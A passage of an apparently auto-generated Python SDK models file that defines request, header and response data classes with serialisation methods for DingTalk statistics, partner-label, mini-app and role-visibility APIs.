self.general_form_create_cnt_1d = m.get('generalFormCreateCnt1d')
return self
class GetGeneralFormCreatedDeptSummaryResponseBody(TeaModel):
def __init__(
self,
data: List[GetGeneralFormCreatedDeptSummaryResponseBodyData] = None,
next_token: int = None,
has_more: bool = None,
):
# 用户版本分布情况列表
self.data = data
# 下一次请 求的分页游标
self.next_token = next_token
# 是否有更多数据
self.has_more = has_more
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.has_more is not None:
result['hasMore'] = self.has_more
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetGeneralFormCreatedDeptSummaryResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('hasMore') is not None:
self.has_more = m.get('hasMore')
return self
class GetGeneralFormCreatedDeptSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetGeneralFormCreatedDeptSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetGeneralFormCreatedDeptSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetCalenderSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetCalenderSummaryResponseBody(TeaModel):
def __init__(
self,
calendar_create_user_cnt: str = None,
):
# 最近1天累计创建日程人数
self.calendar_create_user_cnt = calendar_create_user_cnt
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.calendar_create_user_cnt is not None:
result['calendarCreateUserCnt'] = self.calendar_create_user_cnt
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('calendarCreateUserCnt') is not None:
self.calendar_create_user_cnt = m.get('calendarCreateUserCnt')
return self
class GetCalenderSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetCalenderSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetCalenderSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetAllLabelableDeptsHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel1(TeaModel):
def __init__(
self,
label_id: int = None,
label_name: str = None,
level_num: int = None,
):
# 伙伴类型id
self.label_id = label_id
# 伙伴类型
self.label_name = label_name
# 伙伴类型层级
self.level_num = level_num
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.label_id is not None:
result['labelId'] = self.label_id
if self.label_name is not None:
result['labelName'] = self.label_name
if self.level_num is not None:
result['levelNum'] = self.level_num
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('labelId') is not None:
self.label_id = m.get('labelId')
if m.get('labelName') is not None:
self.label_name = m.get('labelName')
if m.get('levelNum') is not None:
self.level_num = m.get('levelNum')
return self
class GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel2(TeaModel):
def __init__(
self,
label_id: int = None,
label_name: str = None,
level_num: int = None,
):
# 伙伴类型id
self.label_id = label_id
# 伙伴类型
self.label_name = label_name
# 伙伴类型层级
self.level_num = level_num
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.label_id is not None:
result['labelId'] = self.label_id
if self.label_name is not None:
result['labelName'] = self.label_name
if self.level_num is not None:
result['levelNum'] = self.level_num
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('labelId') is not None:
self.label_id = m.get('labelId')
if m.get('labelName') is not None:
self.label_name = m.get('labelName')
if m.get('levelNum') is not None:
self.level_num = m.get('levelNum')
return self
class GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel3(TeaModel):
def __init__(
self,
label_id: int = None,
label_name: str = None,
level_num: int = None,
):
# 伙伴类型id
self.label_id = label_id
# 伙伴类型
self.label_name = label_name
# 伙伴类型层级
self.level_num = level_num
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.label_id is not None:
result['labelId'] = self.label_id
if self.label_name is not None:
result['labelName'] = self.label_name
if self.level_num is not None:
result['levelNum'] = self.level_num
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('labelId') is not None:
self.label_id = m.get('labelId')
if m.get('labelName') is not None:
self.label_name = m.get('labelName')
if m.get('levelNum') is not None:
self.level_num = m.get('levelNum')
return self
class GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel4(TeaModel):
def __init__(
self,
label_id: int = None,
label_name: str = None,
level_num: int = None,
):
# 伙伴类型id
self.label_id = label_id
# 伙伴类型
self.label_name = label_name
# 伙伴类型层级
self.level_num = level_num
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.label_id is not None:
result['labelId'] = self.label_id
if self.label_name is not None:
result['labelName'] = self.label_name
if self.level_num is not None:
result['levelNum'] = self.level_num
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('labelId') is not None:
self.label_id = m.get('labelId')
if m.get('labelName') is not None:
self.label_name = m.get('labelName')
if m.get('levelNum') is not None:
self.level_num = m.get('levelNum')
return self
class GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel5(TeaModel):
def __init__(
self,
label_id: int = None,
label_name: str = None,
level_num: int = None,
):
# 伙伴类型id
self.label_id = label_id
# 伙伴类型
self.label_name = label_name
# 伙伴类型层级
self.level_num = level_num
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.label_id is not None:
result['labelId'] = self.label_id
if self.label_name is not None:
result['labelName'] = self.label_name
if self.level_num is not None:
result['levelNum'] = self.level_num
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('labelId') is not None:
self.label_id = m.get('labelId')
if m.get('labelName') is not None:
self.label_name = m.get('labelName')
if m.get('levelNum') is not None:
self.level_num = m.get('levelNum')
return self
class GetAllLabelableDeptsResponseBodyData(TeaModel):
def __init__(
self,
dept_id: str = None,
super_dept_id: str = None,
dept_name: str = None,
member_count: int = None,
partner_num: str = None,
partner_label_volevel_1: GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel1 = None,
partner_label_volevel_2: GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel2 = None,
partner_label_volevel_3: GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel3 = None,
partner_label_volevel_4: GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel4 = None,
partner_label_volevel_5: GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel5 = None,
):
# 部门id
self.dept_id = dept_id
# 父部门id
self.super_dept_id = super_dept_id
# 部门名称
self.dept_name = dept_name
# 部门人数
self.member_count = member_count
# 部门伙伴编码
self.partner_num = partner_num
# 部门一级伙伴类型
self.partner_label_volevel_1 = partner_label_volevel_1
# 部门二级伙伴类型
self.partner_label_volevel_2 = partner_label_volevel_2
# 部门三级伙伴类型
self.partner_label_volevel_3 = partner_label_volevel_3
# 部门四级伙伴类型
self.partner_label_volevel_4 = partner_label_volevel_4
# 部门五级伙伴类型
self.partner_label_volevel_5 = partner_label_volevel_5
def validate(self):
if self.partner_label_volevel_1:
self.partner_label_volevel_1.validate()
if self.partner_label_volevel_2:
self.partner_label_volevel_2.validate()
if self.partner_label_volevel_3:
self.partner_label_volevel_3.validate()
if self.partner_label_volevel_4:
self.partner_label_volevel_4.validate()
if self.partner_label_volevel_5:
self.partner_label_volevel_5.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.dept_id is not None:
result['deptId'] = self.dept_id
if self.super_dept_id is not None:
result['superDeptId'] = self.super_dept_id
if self.dept_name is not None:
result['deptName'] = self.dept_name
if self.member_count is not None:
result['memberCount'] = self.member_count
if self.partner_num is not None:
result['partnerNum'] = self.partner_num
if self.partner_label_volevel_1 is not None:
result['partnerLabelVOLevel1'] = self.partner_label_volevel_1.to_map()
if self.partner_label_volevel_2 is not None:
result['partnerLabelVOLevel2'] = self.partner_label_volevel_2.to_map()
if self.partner_label_volevel_3 is not None:
result['partnerLabelVOLevel3'] = self.partner_label_volevel_3.to_map()
if self.partner_label_volevel_4 is not None:
result['partnerLabelVOLevel4'] = self.partner_label_volevel_4.to_map()
if self.partner_label_volevel_5 is not None:
result['partnerLabelVOLevel5'] = self.partner_label_volevel_5.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('deptId') is not None:
self.dept_id = m.get('deptId')
if m.get('superDeptId') is not None:
self.super_dept_id = m.get('superDeptId')
if m.get('deptName') is not None:
self.dept_name = m.get('deptName')
if m.get('memberCount') is not None:
self.member_count = m.get('memberCount')
if m.get('partnerNum') is not None:
self.partner_num = m.get('partnerNum')
if m.get('partnerLabelVOLevel1') is not None:
temp_model = GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel1()
self.partner_label_volevel_1 = temp_model.from_map(m['partnerLabelVOLevel1'])
if m.get('partnerLabelVOLevel2') is not None:
temp_model = GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel2()
self.partner_label_volevel_2 = temp_model.from_map(m['partnerLabelVOLevel2'])
if m.get('partnerLabelVOLevel3') is not None:
temp_model = GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel3()
self.partner_label_volevel_3 = temp_model.from_map(m['partnerLabelVOLevel3'])
if m.get('partnerLabelVOLevel4') is not None:
temp_model = GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel4()
self.partner_label_volevel_4 = temp_model.from_map(m['partnerLabelVOLevel4'])
if m.get('partnerLabelVOLevel5') is not None:
temp_model = GetAllLabelableDeptsResponseBodyDataPartnerLabelVOLevel5()
self.partner_label_volevel_5 = temp_model.from_map(m['partnerLabelVOLevel5'])
return self
class GetAllLabelableDeptsResponseBody(TeaModel):
def __init__(
self,
data: List[GetAllLabelableDeptsResponseBodyData] = None,
):
# 伙伴钉可打标部门列表
self.data = data
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetAllLabelableDeptsResponseBodyData()
self.data.append(temp_model.from_map(k))
return self
class GetAllLabelableDeptsResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetAllLabelableDeptsResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetAllLabelableDeptsResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetPublisherSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetPublisherSummaryRequest(TeaModel):
def __init__(
self,
next_token: int = None,
max_results: int = None,
):
# 启始数据游标
self.next_token = next_token
# 每页包含的数据条数
self.max_results = max_results
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.max_results is not None:
result['maxResults'] = self.max_results
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('maxResults') is not None:
self.max_results = m.get('maxResults')
return self
class GetPublisherSummaryResponseBodyData(TeaModel):
def __init__(
self,
union_id: str = None,
publisher_name: str = None,
publisher_article_cnt_std: str = None,
publisher_article_pv_cnt_std: str = None,
):
# 服务窗unionId
self.union_id = union_id
# 服务窗名称
self.publisher_name = publisher_name
# 历史截至当日服务窗文章数
self.publisher_article_cnt_std = publisher_article_cnt_std
# 历史截至当日服务窗文章阅读数
self.publisher_article_pv_cnt_std = publisher_article_pv_cnt_std
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.union_id is not None:
result['unionId'] = self.union_id
if self.publisher_name is not None:
result['publisherName'] = self.publisher_name
if self.publisher_article_cnt_std is not None:
result['publisherArticleCntStd'] = self.publisher_article_cnt_std
if self.publisher_article_pv_cnt_std is not None:
result['publisherArticlePvCntStd'] = self.publisher_article_pv_cnt_std
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('unionId') is not None:
self.union_id = m.get('unionId')
if m.get('publisherName') is not None:
self.publisher_name = m.get('publisherName')
if m.get('publisherArticleCntStd') is not None:
self.publisher_article_cnt_std = m.get('publisherArticleCntStd')
if m.get('publisherArticlePvCntStd') is not None:
self.publisher_article_pv_cnt_std = m.get('publisherArticlePvCntStd')
return self
class GetPublisherSummaryResponseBodyPublisherArticlePvTop5(TeaModel):
def __init__(
self,
name: str = None,
):
# 文章名称
self.name = name
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.name is not None:
result['name'] = self.name
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('name') is not None:
self.name = m.get('name')
return self
class GetPublisherSummaryResponseBody(TeaModel):
def __init__(
self,
data: List[GetPublisherSummaryResponseBodyData] = None,
publisher_cnt_std: str = None,
publisher_article_cnt_std: str = None,
publisher_article_pv_cnt_std: str = None,
publisher_article_pv_top_5: List[GetPublisherSummaryResponseBodyPublisherArticlePvTop5] = None,
next_token: int = None,
has_more: bool = None,
):
# 互动服务窗相关数据
self.data = data
# 历史截至当日服务窗数
self.publisher_cnt_std = publisher_cnt_std
# 历史截至当日服务窗文章数
self.publisher_article_cnt_std = publisher_article_cnt_std
# 历史截至当日服务窗文章阅读数
self.publisher_article_pv_cnt_std = publisher_article_pv_cnt_std
# 阅读量最高的5个文章
self.publisher_article_pv_top_5 = publisher_article_pv_top_5
# 下一次请求的分页游标
self.next_token = next_token
# 是否有更多数据
self.has_more = has_more
def validate(self):
if self.data:
for k in self.data:
if k:
k.validate()
if self.publisher_article_pv_top_5:
for k in self.publisher_article_pv_top_5:
if k:
k.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
result['data'] = []
if self.data is not None:
for k in self.data:
result['data'].append(k.to_map() if k else None)
if self.publisher_cnt_std is not None:
result['publisherCntStd'] = self.publisher_cnt_std
if self.publisher_article_cnt_std is not None:
result['publisherArticleCntStd'] = self.publisher_article_cnt_std
if self.publisher_article_pv_cnt_std is not None:
result['publisherArticlePvCntStd'] = self.publisher_article_pv_cnt_std
result['publisherArticlePvTop5'] = []
if self.publisher_article_pv_top_5 is not None:
for k in self.publisher_article_pv_top_5:
result['publisherArticlePvTop5'].append(k.to_map() if k else None)
if self.next_token is not None:
result['nextToken'] = self.next_token
if self.has_more is not None:
result['hasMore'] = self.has_more
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data = []
if m.get('data') is not None:
for k in m.get('data'):
temp_model = GetPublisherSummaryResponseBodyData()
self.data.append(temp_model.from_map(k))
if m.get('publisherCntStd') is not None:
self.publisher_cnt_std = m.get('publisherCntStd')
if m.get('publisherArticleCntStd') is not None:
self.publisher_article_cnt_std = m.get('publisherArticleCntStd')
if m.get('publisherArticlePvCntStd') is not None:
self.publisher_article_pv_cnt_std = m.get('publisherArticlePvCntStd')
self.publisher_article_pv_top_5 = []
if m.get('publisherArticlePvTop5') is not None:
for k in m.get('publisherArticlePvTop5'):
temp_model = GetPublisherSummaryResponseBodyPublisherArticlePvTop5()
self.publisher_article_pv_top_5.append(temp_model.from_map(k))
if m.get('nextToken') is not None:
self.next_token = m.get('nextToken')
if m.get('hasMore') is not None:
self.has_more = m.get('hasMore')
return self
class GetPublisherSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetPublisherSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetPublisherSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class UpdateMiniAppVersionStatusHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class UpdateMiniAppVersionStatusRequest(TeaModel):
def __init__(
self,
version_type: int = None,
version: str = None,
mini_app_id: str = None,
ding_client_id: str = None,
ding_token_grant_type: int = None,
ding_org_id: int = None,
ding_isv_org_id: int = None,
ding_suite_key: str = None,
ding_corp_id: str = None,
):
# 版本类型
self.version_type = version_type
# 版本
self.version = version
# 小程序id
self.mini_app_id = mini_app_id
self.ding_client_id = ding_client_id
self.ding_token_grant_type = ding_token_grant_type
self.ding_org_id = ding_org_id
self.ding_isv_org_id = ding_isv_org_id
self.ding_suite_key = ding_suite_key
self.ding_corp_id = ding_corp_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.version_type is not None:
result['versionType'] = self.version_type
if self.version is not None:
result['version'] = self.version
if self.mini_app_id is not None:
result['miniAppId'] = self.mini_app_id
if self.ding_client_id is not None:
result['dingClientId'] = self.ding_client_id
if self.ding_token_grant_type is not None:
result['dingTokenGrantType'] = self.ding_token_grant_type
if self.ding_org_id is not None:
result['dingOrgId'] = self.ding_org_id
if self.ding_isv_org_id is not None:
result['dingIsvOrgId'] = self.ding_isv_org_id
if self.ding_suite_key is not None:
result['dingSuiteKey'] = self.ding_suite_key
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('versionType') is not None:
self.version_type = m.get('versionType')
if m.get('version') is not None:
self.version = m.get('version')
if m.get('miniAppId') is not None:
self.mini_app_id = m.get('miniAppId')
if m.get('dingClientId') is not None:
self.ding_client_id = m.get('dingClientId')
if m.get('dingTokenGrantType') is not None:
self.ding_token_grant_type = m.get('dingTokenGrantType')
if m.get('dingOrgId') is not None:
self.ding_org_id = m.get('dingOrgId')
if m.get('dingIsvOrgId') is not None:
self.ding_isv_org_id = m.get('dingIsvOrgId')
if m.get('dingSuiteKey') is not None:
self.ding_suite_key = m.get('dingSuiteKey')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
return self
class UpdateMiniAppVersionStatusResponseBody(TeaModel):
def __init__(
self,
code: str = None,
cause: str = None,
):
# 返回码
self.code = code
# 原因
self.cause = cause
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.code is not None:
result['code'] = self.code
if self.cause is not None:
result['cause'] = self.cause
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('code') is not None:
self.code = m.get('code')
if m.get('cause') is not None:
self.cause = m.get('cause')
return self
class UpdateMiniAppVersionStatusResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: UpdateMiniAppVersionStatusResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = UpdateMiniAppVersionStatusResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class UpdateRoleVisibilityHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class UpdateRoleVisibilityRequest(TeaModel):
def __init__(
self,
label_id: int = None,
dept_ids: List[int] = None,
user_ids: List[str] = None,
ding_client_id: str = None,
ding_token_grant_type: int = None,
ding_org_id: int = None,
ding_isv_org_id: int = None,
ding_suite_key: str = None,
ding_corp_id: str = None,
):
# 标签id
self.label_id = label_id
# 可见的部门id
self.dept_ids = dept_ids
# 可见的员工id
self.user_ids = user_ids
self.ding_client_id = ding_client_id
self.ding_token_grant_type = ding_token_grant_type
self.ding_org_id = ding_org_id
self.ding_isv_org_id = ding_isv_org_id
self.ding_suite_key = ding_suite_key
self.ding_corp_id = ding_corp_id
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.label_id is not None:
result['labelId'] = self.label_id
if self.dept_ids is not None:
result['deptIds'] = self.dept_ids
if self.user_ids is not None:
result['userIds'] = self.user_ids
if self.ding_client_id is not None:
result['dingClientId'] = self.ding_client_id
if self.ding_token_grant_type is not None:
result['dingTokenGrantType'] = self.ding_token_grant_type
if self.ding_org_id is not None:
result['dingOrgId'] = self.ding_org_id
if self.ding_isv_org_id is not None:
result['dingIsvOrgId'] = self.ding_isv_org_id
if self.ding_suite_key is not None:
result['dingSuiteKey'] = self.ding_suite_key
if self.ding_corp_id is not None:
result['dingCorpId'] = self.ding_corp_id
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('labelId') is not None:
self.label_id = m.get('labelId')
if m.get('deptIds') is not None:
self.dept_ids = m.get('deptIds')
if m.get('userIds') is not None:
self.user_ids = m.get('userIds')
if m.get('dingClientId') is not None:
self.ding_client_id = m.get('dingClientId')
if m.get('dingTokenGrantType') is not None:
self.ding_token_grant_type = m.get('dingTokenGrantType')
if m.get('dingOrgId') is not None:
self.ding_org_id = m.get('dingOrgId')
if m.get('dingIsvOrgId') is not None:
self.ding_isv_org_id = m.get('dingIsvOrgId')
if m.get('dingSuiteKey') is not None:
self.ding_suite_key = m.get('dingSuiteKey')
if m.get('dingCorpId') is not None:
self.ding_corp_id = m.get('dingCorpId')
return self
class UpdateRoleVisibilityResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: bool = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
self.body = m.get('body')
return self
class GetGeneralFormCreatedSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetGeneralFormCreatedSummaryResponseBody(TeaModel):
def __init__(
self,
general_form_created_cnt: str = None,
):
# 最近1天累计智能填表创建数
self.general_form_created_cnt = general_form_created_cnt
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.general_form_created_cnt is not None:
result['generalFormCreatedCnt'] = self.general_form_created_cnt
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('generalFormCreatedCnt') is not None:
self.general_form_created_cnt = m.get('generalFormCreatedCnt')
return self
class GetGeneralFormCreatedSummaryResponse(TeaModel):
def __init__(
self,
headers: Dict[str, str] = None,
body: GetGeneralFormCreatedSummaryResponseBody = None,
):
self.headers = headers
self.body = body
def validate(self):
self.validate_required(self.headers, 'headers')
self.validate_required(self.body, 'body')
if self.body:
self.body.validate()
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.body is not None:
result['body'] = self.body.to_map()
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('headers') is not None:
self.headers = m.get('headers')
if m.get('body') is not None:
temp_model = GetGeneralFormCreatedSummaryResponseBody()
self.body = temp_model.from_map(m['body'])
return self
class GetDocCreatedSummaryHeaders(TeaModel):
def __init__(
self,
common_headers: Dict[str, str] = None,
x_acs_dingtalk_access_token: str = None,
):
self.common_headers = common_headers
self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
return _map
result = dict()
if self.common_headers is not None:
result['commonHeaders'] = self.common_headers
if self.x_acs_dingtalk_access_token is not None:
result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('commonHeaders') is not None:
self.common_headers = m.get('commonHeaders')
if m.get('x-acs-dingtalk-access-token') is not None:
self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
return self
class GetDocCreatedSummaryResponseBody(TeaModel):
def __init__(
self,
doc_created_cnt: str = None,
):
# 最近1天累计创建文档数
self.doc_created_cnt = doc_created_cnt
def validate(self):
pass
def to_map(self):
_map = super().to_map()
if _map is not None:
